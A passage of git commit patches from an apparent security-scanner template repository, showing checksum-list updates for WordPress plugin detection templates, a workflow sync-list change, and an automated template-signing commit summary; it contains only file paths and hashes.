+http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:7431bdf1ec1dd11a0ce83200c4e7eecf9035f15c -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e54b87b0d1993c70a1e79f3586f4b5fcc1f69a1b -http/technologies/wordpress/plugins/sucuri-scanner.yaml:72984603e4f105d8eec4f0ec74fcb882b5feecb9 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c82e6a886de6dd292ba78f68a5edbb100b802f68 -http/technologies/wordpress/plugins/tablepress.yaml:12a209f39e5d6c5a0ef1273bd990d53400f7477d -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:640cd544c1c6aa44da2d1c41d6e62b909e223cde -http/technologies/wordpress/plugins/templately.yaml:75907b9782d70a0b15bf233ab05b9dcb9fc1a7ae -http/technologies/wordpress/plugins/the-events-calendar.yaml:98f71a2686e68c36f087f762007a51efafb782e1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:8f4358301a38628a2ccf5a6daef44def124d7189 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:4bff59b48f7139ec8dcbf2d14354b692b74b335f -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:c0886c23d9a8291ee06dc643a8e62af1ca0354b5 -http/technologies/wordpress/plugins/under-construction-page.yaml:47c02b2c5453a29ea422b70e57c3dc45b0f734fd +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:1764b3b37065c0af6c554171dfcc10792e0c5218 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:1e08b06e54eb3400dcf8032cbe3d3560f1868e3a +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:34d7011ca6ba5dc06fdc60b30eda88ddf49fe3e1 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e2b5f4e45bb9362be1d7cd52d26240127fe0406d -http/technologies/wordpress/plugins/webp-express.yaml:deda558254c7bb7ec3502a4f0a0d2cb82a534b60 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:09b5bb138eb5c0d82e39401cdfca5fbb450f75b5 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:54ba6ea96a891b73a797f2d640ad80983772c45c -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:d1f0884ba3e2c41f15324f627bf299b2ceec25d7 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:e94a04f58201c61f74360ce2d429191ff8bbef4a +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c02d8b8907167efc1957f4bb90b3865efa050489 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:bcce8f61b06ab4e7860b8965ba66d12d27e5e072 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:c245c089a83d7b886f599c7aee6b213dec672fba -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:be918c0fbc91f2a05a507a4109eb3b8321282ee9 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:4314caa3d6967b53baa3faee5bfaf0865ea33cbb -http/technologies/wordpress/plugins/woocommerce-services.yaml:dc6dc2f31fb27d17a9b2c181afd70f8329f3553a -http/technologies/wordpress/plugins/woocommerce.yaml:6f88d2aa6f14a89e4fe3fd4b03546be6c221c14f -http/technologies/wordpress/plugins/wordfence.yaml:a7dbc70f71758b50f5e8e5541d168e13b0e31ebd -http/technologies/wordpress/plugins/wordpress-importer.yaml:6a70202c2965a18616513625fb01fe73e49d0daa -http/technologies/wordpress/plugins/wordpress-seo.yaml:64d417c0759af592d6f1207c635c05f2614b1e87 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:925e17a4bc0b5846249b0250e72140f9f9aa4b14 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:4d60f9bc688f5bcc53471a6efa1ae88339c4e5ab -http/technologies/wordpress/plugins/wp-file-manager.yaml:fedf1a15ff96e6bf4b4f726ab772e2c2fe9e0831 -http/technologies/wordpress/plugins/wp-google-maps.yaml:d1bf03acbf874ae4673386de463e9d75a2e9c43c -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:d60f81c9e6ab1d24ddc6f35588fc45622b7fa215 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:daf12a156ae8d7c6c147cec18087fa7701259659 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:0c53b252e195671dd3a87b48dafba308561f52db -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:a97eeb8fb7952c4eb0522cb31812f2648b36f15e -http/technologies/wordpress/plugins/wp-optimize.yaml:c6d9e8669ca1b890e031bcaeb80d6aeaf380c2be -http/technologies/wordpress/plugins/wp-pagenavi.yaml:0b19cd3d8934acd4f9c674d9e9fdc0f22ba6da2c -http/technologies/wordpress/plugins/wp-reset.yaml:e8a73eda5c3734c8496b26fd1c045713336ba61e -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4e31ae559d8e414aaea3dd88e12a839f78dc60f5 -http/technologies/wordpress/plugins/wp-rollback.yaml:d334260671f7da5686ae5880d859c17fd4cc73fa -http/technologies/wordpress/plugins/wp-seopress.yaml:527eb2cf14508c3a38adbc4a745aabc23e705436 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4a744e660d68ef8ff9d6be727e1e753de300248b -http/technologies/wordpress/plugins/wp-smushit.yaml:85909bdd00880e138f99cb746cc52509bab4997d -http/technologies/wordpress/plugins/wp-statistics.yaml:50dd652e2b870e320d1f3dfcc8466e58ffa42f60 -http/technologies/wordpress/plugins/wp-super-cache.yaml:c75585c11b43540c5be523f1fcc5c92d7e879699 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:184a0bca0d198ff725dae2f1851e442157973362 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:e929146b632d95b570d2260d1496dd6d24011b02 -http/technologies/wordpress/plugins/wpforms-lite.yaml:8e76acc5264bd0c2a903afacc47ff08b55e0c794 -http/technologies/wordpress/plugins/wps-hide-login.yaml:88ca9409423c21d5a189a1c9c07d4ca2720ab964 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:66b06918fc4c54c8e10cd6a222be50a58ce05e96 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:8b4ba30f1bc172790a73d0dacdad66477042488c +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7795,7 +7797,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/backdoor/polyfill-backdoor.yaml:12ec4ad8b5b872056c773edf10c4e167977b7f6b +http/vulnerabilities/backdoor/polyfill-backdoor.yaml:45b5279cb49b4f23febd738646c752c564859b53 http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 @@ -8882,7 +8884,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9923fa649026efc80e5922e143d578e3bbea683f +templates-checksum.txt:44107720d023cae03c471785fdd3645850f59330 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 604990adac86fb1557ed8c4caff16b22594cb0ea Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 03:34:23 +0000 Subject: [PATCH 1288/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ff6f26f13c..97b66ddad4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' + - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: From 78b75fd398da715239c5f41f26ea1e45ac1c6c1a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 03:35:23 +0000 Subject: [PATCH 1289/1841] Auto Template Signing [Tue Jul 16 03:35:23 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36401.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 334b162ac8..eb40bc63a5 100644 --- 